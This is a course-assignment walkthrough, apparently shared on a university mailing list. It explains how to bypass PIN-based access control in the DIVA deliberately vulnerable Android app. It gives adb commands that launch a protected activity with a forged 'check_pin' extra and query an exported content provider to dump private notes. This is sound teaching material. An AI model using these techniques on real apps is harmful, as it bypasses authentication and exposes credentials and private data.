Notes

Assignment 18

a. Authentication Based Access Control Issues Part -2

b. In this case the attacker authenticate him or herself and somehow get the access to protected resources or sensitive information that this issues comes under the authentication based access control issues.

c. In this challenge is same as before but this case we have to access the protected resources which contain the twitter API credential but only difference is that you can access Twitter API credential after entering the PIN number, which means that you are authenticated and then only you can access the sensitive information with the option register now or already registered.

d. Now our job is to abuse this mechanism and by pass the authenticate check.

e. DIVA: Access Control Issues Part – 2. In this case to view the view twitter API Credentials either by register now or by already registered.

f. If you click on register now then it as for register with http://payatu.com to get you pin and then login with the PIN.

g. In the second scenario Already Register then we are able to see the Twitter API credential.

h. Now we can invoke the activity which shows twitter API credential directly,

i. santoku@santoku:Desktop/jadx/bin/diva:#

j. santoku@santoku:Desktop/jadx/bin/: # vim AdndroidManifest.xml

k. you can finds all the activity with their respective permission in the manifest file.

l. Find the activity entry android name=”jakhar.aseem.diva.AccessControl2Activity”, this activity which contain button label with ViewAPICredentials and when we click on it as we observed it will open one more activity which is registered as android name=”jakhar.aseem.diva.APICreds2Activity” in the manifest.xml file. This activity contain sensitive information related to API.

m. Now AccessControl1Activity invokes the APICredsActivity activity using <intent-filter> activity

<action android name=”jakhar.aseem.diva.action.VIEW_CREDS2” which contain API sensitive data.

n. Now copy the above filter intent and opens using activity manger directly

o. Every android has activity manger and we will use same.

p. santoku@santoku:/$ adb shell

q. root@santoku:/am // and you can see all the help / information related to activity mangar.

r. root@santoku:$: am start –a jakhar.aseem.diva.action.VIEW_CREDS2 // intent filter

s. hit enter and see in the Genymotion that the said activity has not opened because the said activity which contain Twitter API information can be open after entering the PIN number only. So it is protected and we can not access the said activity directly through Android Manger with start option.

t. Let wee the source code so we can get inside of it.

u. santoku@santoku:Desktop/jadx/bin/: # cd diva

v. santoku@santoku:Desktop/jadx/bin/diva:# cd jakhar/

w. santoku@santoku:Desktop/jadx/bin/diva/jakhar/: #cd assem/

x. santoku@santoku:Desktop/jadx/bin/diva/jakhar/assem/: #cd diva

y. santoku@santoku:Desktop/jadx/bin/diva/jakhar/assem/diva: #ls

z. find the activity name AccessControl2Activity.java

aa. santoku@santoku:Desktop/jadx/bin/diva/jakhar/assem/diva:# vim AccessControl2Activity.java

bb. he in the source code we finds function public void viewAPICredentials(View view)

it has one variable chk_pin which is of Boolean type. So every thing is controlled by the chk_pin value that is true or false.

cc. So we need to pass the value of chk_pin with android manager but it is not that much easy.

dd. Now remember chk_pin is not actual string but string.xml file contain the reference of string and actual value of chk_pin is different.

ee. Now open the source code of diva-android from https://github.com/payatu/diva-android, from which we can download the source code.

ff. Click on app folder and src (source) à main à res (resources) à values à string.xml. it contain all the string with the values.

gg. Now search for chk_pin and found the following entry

hh. <string name="chk_pin">check_pin</string>

ii. santoku@santoku:$ adb shell

jj. root@santoku: am

kk. and check the option. Check the option of <INTENT> to pass the parameter we need to use

-e (for string value), -ez (<EXTRA_KEY> <EXTRA_BOOLEAN_VALUE>) with –a. For other value check other options.

ll. root@santoku:$: am start –a jakhar.aseem.diva.action.VIEW_CREDS2 –ez “check_pin” false

Now check in the Gynimotion and found that activit y is stared and shown the sensitive information of Twitter API

a. DIVA - Access Control Issues Part – 3

b. In this challenges, to access the private notes we have to enter PIN, but because of the said vulnerability we can abuse the current mechanism and access same without entering the PIN.

c. DIVA - Access Control Issues Part – 3 – enter the 4 digits pin and it will create the 4 digit pin and private notes are protected with this pin only. Now if you click on private note it will ask for 4 digits PIN and we can access the private notes.

d. Challenge is to access the private notes without entering the 4 digits PIN. For same we need to perform following things

a. Find out the content provider URI.

b. Then we will query data from that particular content provider.

e. santoku@santoku:Desktop/jadx/bin/diva: # vim AdndroidManifest.xml

f. < provider android:name=”jakhar.aseem.diva.NoteProvider” android:enable=”ture” android:exported=”true” android.authorities=”jakhar.aseem.diva.provider.notesprovider”/>

(Exit from vim – wq!:)

g. Inside this provider we have almost four activities.

h. Now move to the source code.

i. santoku@santoku:Desktop/jadx/bin/diva $ cd jakhar/aseem/diva

j. santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva: $ ls

k. find AccessControl3Activity.java santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva: $ vim AccessControl3Activity.java

l. and another file NotesProvider.java // may have information related to content provider

m. santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva: $ vim NotesProvider.java

n. check the code very carefully and found that static final Uri CONTENT_URI = Uri.parse(“content://jakhar.aseem.diva.provider.notesprovider/notes”);

o. santoku@santoku:Desktop/jadx/bin/diva/jakhar/aseem/diva:$ cd

p. santoku@santoku:$ adb shell content query –uri content://jakhar.aseem.diva.provider.notesprovider/notes

q. Now you can see that we can access all the private notes without entering PIN number.

r. Why because content://jakhar.aseem.diva.provider.notesprovider/notes content provider leaking data.

s. Note that you can also exploit same vulnerability

--
Dr. Digvijaysinh Rathod
Assistant Professor
Gujarat Forensic Sciences University - State University
Institute of Forensic Science
Sector - 9 , Gandhinagar,Gujarat,India
M: + 91 97236 19183
www.gfsu.edu.in
https://www.facebook.com/todigvijay
--
You received this message because you are subscribed to the Google Groups "CSIR18" group.
To unsubscribe from this group and stop receiving emails from it, send an email to [email protected].
To post to this group, send email to [email protected].
To view this discussion on the web visit https://groups.google.com/d/msgid/csir18/CANgUZS%3DYd6Z1%2B%2Br2XUhyiopwfbBr0sFmGW5DUtEzweBXdZ2SfA%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.